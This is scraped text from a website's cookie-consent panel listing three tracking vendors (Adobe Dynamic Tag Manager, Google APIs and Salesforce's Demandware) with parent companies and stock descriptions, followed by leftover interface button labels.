ADOBE DYNAMIC TAG MANAGER
PARENT COMPANY
ADOBE
DEFAULT DESCRIPTION
ADOBE DYNAMIC TAG MANAGEMENT (DTM) LETS MARKETERS QUICKLY AND EASILY MANAGE TAGS
AND PROVIDES INNOVATIVE TOOLS FOR COLLECTING AND DISTRIBUTING DATA ACROSS
DIGITAL MARKETING SYSTEMS.
GOOGLE APIS
PARENT COMPANY
GOOGLE
DEFAULT DESCRIPTION
GOOGLE APIS ARE APPLICATION PROGRAMMING INTERFACES DEVELOPED BY GOOGLE WHICH
ALLOW COMMUNICATION WITH GOOGLE SERVICES AND THEIR INTEGRATION TO OTHER
SERVICES. EXAMPLES OF THESE INCLUDE SEARCH, GMAIL, TRANSLATE OR GOOGLE MAPS.
DEMANDWARE
PARENT COMPANY
SALESFORCE.COM, INC.
DEFAULT DESCRIPTION
THE SALESFORCE COMMERCE CLOUD, FORMERLY DEMANDWARE, POWERS ENTERPRISE CLOUD
COMMERCE FOR THE WORLD'S MOST INNOVATIVE BRANDS, ENABLING UNIFIED, 1-TO-1
EXPERIENCES ACROSS ALL POINTS OF COMMERCE INCLUDING WEB, MOBILE, SOCIAL AND
STORE.
Back Button
COOKIE LIST
Filter Button
Consent Leg.Interest
Switch Label label
Switch Label label
Switch Label label
Clear
checkbox label label
Apply Cancel
Save Settings
Allow All